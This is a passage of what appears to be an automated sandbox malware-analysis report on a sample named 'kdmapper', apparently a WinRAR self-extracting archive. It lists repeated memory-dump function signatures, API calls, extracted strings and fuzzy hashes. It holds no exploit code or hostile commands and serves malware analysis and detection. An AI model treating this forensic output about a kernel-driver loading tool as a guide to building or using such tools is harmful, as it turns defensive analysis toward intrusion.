                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                          • Opcode ID: 062b6db372f5565239a98bd31ce2e80bd7116d082142d265e742cdee1ca4d90b
                                                                                                                                                                          • Instruction ID: 80e41094222c2a36d2708b917ffb3124de276dba8bf2e86c36f3acdd962367af
                                                                                                                                                                          • Opcode Fuzzy Hash: 062b6db372f5565239a98bd31ce2e80bd7116d082142d265e742cdee1ca4d90b
                                                                                                                                                                          • Instruction Fuzzy Hash: E5E0EC31942731BBD3615B71AC0EB8A3E56AB16F52F012301FA05AA2D0DBA48A008BA5
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcschr
                                                                                                                                                                          • String ID: .lnk$dc
                                                                                                                                                                          • API String ID: 2691759472-1909988810
                                                                                                                                                                          • Opcode ID: 852d558af71a6ba6df5801e9ee1545325ceb2d138c053daca541ba174f9682f4
                                                                                                                                                                          • Instruction ID: 8b46d284c55de3d1fbdc919a018d7840b5ce1015f6c47af08e78e5f504ac17f9
                                                                                                                                                                          • Opcode Fuzzy Hash: 852d558af71a6ba6df5801e9ee1545325ceb2d138c053daca541ba174f9682f4
                                                                                                                                                                          • Instruction Fuzzy Hash: 71A171728002299ADF24DBA0DD45EFB73FEEF45304F0885A6B509E7141EE749B858FA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 0064B324
                                                                                                                                                                            • Part of subcall function 00649097: IsProcessorFeaturePresent.KERNEL32(00000017,00649086,00000050,00653A34,?,0062D710,00000004,00661030,?,?,00649093,00000000,00000000,00000000,00000000,00000000), ref: 00649099
                                                                                                                                                                            • Part of subcall function 00649097: GetCurrentProcess.KERNEL32(C0000417,00653A34,00000050,00661030), ref: 006490BB
                                                                                                                                                                            • Part of subcall function 00649097: TerminateProcess.KERNEL32(00000000), ref: 006490C2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                          • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                                                                                                          • Instruction ID: 9838825a44ab47aa2e55b00c221ff538507e48db1232743ee9616522c67d67df
                                                                                                                                                                          • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                                                                                                          • Instruction Fuzzy Hash: 66518E71E0020AAFDF15DFA9C881AEEBBB6EF58310F248169E854E7340E771DA018B50
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 006275E3
                                                                                                                                                                            • Part of subcall function 006305DA: _wcslen.LIBCMT ref: 006305E0
                                                                                                                                                                            • Part of subcall function 0062A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0062A598
                                                                                                                                                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0062777F
                                                                                                                                                                            • Part of subcall function 0062A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A501
                                                                                                                                                                            • Part of subcall function 0062A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A532
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                                                          • String ID: :
                                                                                                                                                                          • API String ID: 3226429890-336475711
                                                                                                                                                                          • Opcode ID: d66017bd48cd029954cde4b8af197923fae82d0d38d1d951d694ea23f407ebec
                                                                                                                                                                          • Instruction ID: f386e7f821b3d76a7b009d195370b4e7c1152ffbd615d47f5bb7df3c736e563f
                                                                                                                                                                          • Opcode Fuzzy Hash: d66017bd48cd029954cde4b8af197923fae82d0d38d1d951d694ea23f407ebec
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B41B471800A78AAEB21EB64EC55EDEB37EAF41300F00409AB605A3192DB745F89CF75
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcschr
                                                                                                                                                                          • String ID: *
                                                                                                                                                                          • API String ID: 2691759472-163128923
                                                                                                                                                                          • Opcode ID: 37d7f4cbe04ff06870923f808a55b193d737051a3792cc0975965ef22fde4063
                                                                                                                                                                          • Instruction ID: 869c4043cda93f8773304b70659eedaddcf002af8c17814c03183491f3168d42
                                                                                                                                                                          • Opcode Fuzzy Hash: 37d7f4cbe04ff06870923f808a55b193d737051a3792cc0975965ef22fde4063
                                                                                                                                                                          • Instruction Fuzzy Hash: E0316822504F319A8B30FE04B8826BB73E7DFA1B10F14A01EFD8447287E7618D469F22
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: }
                                                                                                                                                                          • API String ID: 176396367-4239843852
                                                                                                                                                                          • Opcode ID: 32e2a4d2907437d84ffa25d36cb4651d7850908ec33a5e8d287c99836751ea59
                                                                                                                                                                          • Instruction ID: 6c29c92547f73e12732bb6fdff312070ca2f54685586daf85fff8de07263823b
                                                                                                                                                                          • Opcode Fuzzy Hash: 32e2a4d2907437d84ffa25d36cb4651d7850908ec33a5e8d287c99836751ea59
                                                                                                                                                                          • Instruction Fuzzy Hash: 5621D1729053165ADB31EE64D845BAEB3DEDF81760F04142EF680C7242EB65DD4883EA
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0062F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0062F2E4
                                                                                                                                                                            • Part of subcall function 0062F2C5: GetProcAddress.KERNEL32(006681C8,CryptUnprotectMemory), ref: 0062F2F4
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,0062F33E), ref: 0062F3D2
                                                                                                                                                                          Strings
                                                                                                                                                                          • CryptUnprotectMemory failed, xrefs: 0062F3CA
                                                                                                                                                                          • CryptProtectMemory failed, xrefs: 0062F389
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$CurrentProcess
                                                                                                                                                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                          • API String ID: 2190909847-396321323
                                                                                                                                                                          • Opcode ID: 5648e73d0b5a6886992a21925c92dc45333f770fee8978748d358651736f248b
                                                                                                                                                                          • Instruction ID: 3668f6d5fbcc0d2f7f4a510470ca1be62bca5c8da3399283468b450e0c494845
                                                                                                                                                                          • Opcode Fuzzy Hash: 5648e73d0b5a6886992a21925c92dc45333f770fee8978748d358651736f248b
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E11A231601A39ABDF15EF30E8456AE3B67AF05B60B144239FC415B391DA749E018FD5
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00010000,00631160,?,00000000,00000000), ref: 00631043
                                                                                                                                                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 0063108A
                                                                                                                                                                            • Part of subcall function 00626C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00626C54
                                                                                                                                                                            • Part of subcall function 00626DCB: _wcschr.LIBVCRUNTIME ref: 00626E0A
                                                                                                                                                                            • Part of subcall function 00626DCB: _wcschr.LIBVCRUNTIME ref: 00626E19
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                                                                                          • String ID: CreateThread failed
                                                                                                                                                                          • API String ID: 2706921342-3849766595
                                                                                                                                                                          • Opcode ID: 938a71ed9ef4fde0ea0c6de96f7d28b28a0a7968ad593d9c9a6b294ac4e8f9a1
                                                                                                                                                                          • Instruction ID: 348f9a32504705426a809580f116707cfecf74bceaf8b6df2efacb19be2f3e3d
                                                                                                                                                                          • Opcode Fuzzy Hash: 938a71ed9ef4fde0ea0c6de96f7d28b28a0a7968ad593d9c9a6b294ac4e8f9a1
                                                                                                                                                                          • Instruction Fuzzy Hash: CA012B753003096FD3346F24EC51BB6B35BEB41751F20042EF5465A2C0CFA068844764
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcschr
                                                                                                                                                                          • String ID: <9e$?*<>|"
                                                                                                                                                                          • API String ID: 2691759472-210875737
                                                                                                                                                                          • Opcode ID: 2e562c5ced7adaa82f7d270fad0adbe289eafd65b5f7a7f8f1210cc6531adb9f
                                                                                                                                                                          • Instruction ID: cbafdeb2325762512801a8cfc6ff1452389ba019439010de2fef75d1a98c28d1
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e562c5ced7adaa82f7d270fad0adbe289eafd65b5f7a7f8f1210cc6531adb9f
                                                                                                                                                                          • Instruction Fuzzy Hash: 99F0F953544B22C1C7301F25780177AB3E7DF95B30F34441EE5C8873C2E5A388C08AA5
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: Software\WinRAR SFX$c
                                                                                                                                                                          • API String ID: 176396367-1845986509
                                                                                                                                                                          • Opcode ID: 723b70f0406bcf0dc5ae1a3655bc841fa71e7a393d7190261a6290db901b30bc
                                                                                                                                                                          • Instruction ID: ad7d2439ca9f152cd813bb830e5adfa5a5516c0496182cf3173f08cf589b909c
                                                                                                                                                                          • Opcode Fuzzy Hash: 723b70f0406bcf0dc5ae1a3655bc841fa71e7a393d7190261a6290db901b30bc
                                                                                                                                                                          • Instruction Fuzzy Hash: EB017171500128BADB219B95DC0AFDF7FBEEF05790F000056F54AA11A0DBB09A88CBE1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0062C29A: _wcslen.LIBCMT ref: 0062C2A2
                                                                                                                                                                            • Part of subcall function 00631FDD: _wcslen.LIBCMT ref: 00631FE5
                                                                                                                                                                            • Part of subcall function 00631FDD: _wcslen.LIBCMT ref: 00631FF6
                                                                                                                                                                            • Part of subcall function 00631FDD: _wcslen.LIBCMT ref: 00632006
                                                                                                                                                                            • Part of subcall function 00631FDD: _wcslen.LIBCMT ref: 00632014
                                                                                                                                                                            • Part of subcall function 00631FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0062B371,?,?,00000000,?,?,?), ref: 0063202F
                                                                                                                                                                            • Part of subcall function 0063AC04: SetCurrentDirectoryW.KERNELBASE(?,0063AE72,C:\Users\user\Desktop,00000000,0066946A,00000006), ref: 0063AC08
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0063AE8B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                                                                                                          • String ID: <c$C:\Users\user\Desktop
                                                                                                                                                                          • API String ID: 521417927-688923738
                                                                                                                                                                          • Opcode ID: a39d4620f6d6eddc9033c995fa08212ac363e2a4b28bc2b030c436f1bcc1888f
                                                                                                                                                                          • Instruction ID: 80939d997398e46ef876be46d581097b8ed02e9c52b14fcfd37e2a8f0e60496d
                                                                                                                                                                          • Opcode Fuzzy Hash: a39d4620f6d6eddc9033c995fa08212ac363e2a4b28bc2b030c436f1bcc1888f
                                                                                                                                                                          • Instruction Fuzzy Hash: A7017171D40228A6DF50ABE4DD0AEDE77FEAF09700F000459F546E3191EAB49644CBE9
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 006497E5: GetLastError.KERNEL32(?,00661030,00644674,00661030,?,?,00643F73,00000050,?,00661030,00000200), ref: 006497E9
                                                                                                                                                                            • Part of subcall function 006497E5: _free.LIBCMT ref: 0064981C
                                                                                                                                                                            • Part of subcall function 006497E5: SetLastError.KERNEL32(00000000,?,00661030,00000200), ref: 0064985D
                                                                                                                                                                            • Part of subcall function 006497E5: _abort.LIBCMT ref: 00649863
                                                                                                                                                                          • _abort.LIBCMT ref: 0064BB80
                                                                                                                                                                          • _free.LIBCMT ref: 0064BBB4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast_abort_free
                                                                                                                                                                          • String ID: pe
                                                                                                                                                                          • API String ID: 289325740-324909747
                                                                                                                                                                          • Opcode ID: d17e8be7a46455546334f283c3bff20740e98a8b657413ea9b0309e68f0215e2
                                                                                                                                                                          • Instruction ID: ec7ab04b93cf55b21c470c93c004a3bd8db6d89d17771502269c116d0aab463b
                                                                                                                                                                          • Opcode Fuzzy Hash: d17e8be7a46455546334f283c3bff20740e98a8b657413ea9b0309e68f0215e2
                                                                                                                                                                          • Instruction Fuzzy Hash: C401A131D017229BCB66AF58D84269DB7A3FF04721F15110DE82467791CF65AD018BC5
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Malloc
                                                                                                                                                                          • String ID: (c$Zc
                                                                                                                                                                          • API String ID: 2696272793-3658583006
                                                                                                                                                                          • Opcode ID: 4f006bb08cd2eefbb98f2f3d271c7fcace1d8394f4424242d3f1a97fcdf1970a
                                                                                                                                                                          • Instruction ID: ae2d80263821d51e3c1add5ee7ac6502de9f8b117aafd73cf84a6733adccf97a
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f006bb08cd2eefbb98f2f3d271c7fcace1d8394f4424242d3f1a97fcdf1970a
                                                                                                                                                                          • Instruction Fuzzy Hash: 62016D76640118FF9F059FB0DD49CEE7BAEEF04744B101155B906D7220E731AA44DBA0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0064BF30: GetEnvironmentStringsW.KERNEL32 ref: 0064BF39
                                                                                                                                                                            • Part of subcall function 0064BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0064BF5C
                                                                                                                                                                            • Part of subcall function 0064BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0064BF82
                                                                                                                                                                            • Part of subcall function 0064BF30: _free.LIBCMT ref: 0064BF95
                                                                                                                                                                            • Part of subcall function 0064BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0064BFA4
                                                                                                                                                                          • _free.LIBCMT ref: 006482AE
                                                                                                                                                                          • _free.LIBCMT ref: 006482B5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                          • String ID: 0"h
                                                                                                                                                                          • API String ID: 400815659-1072796616
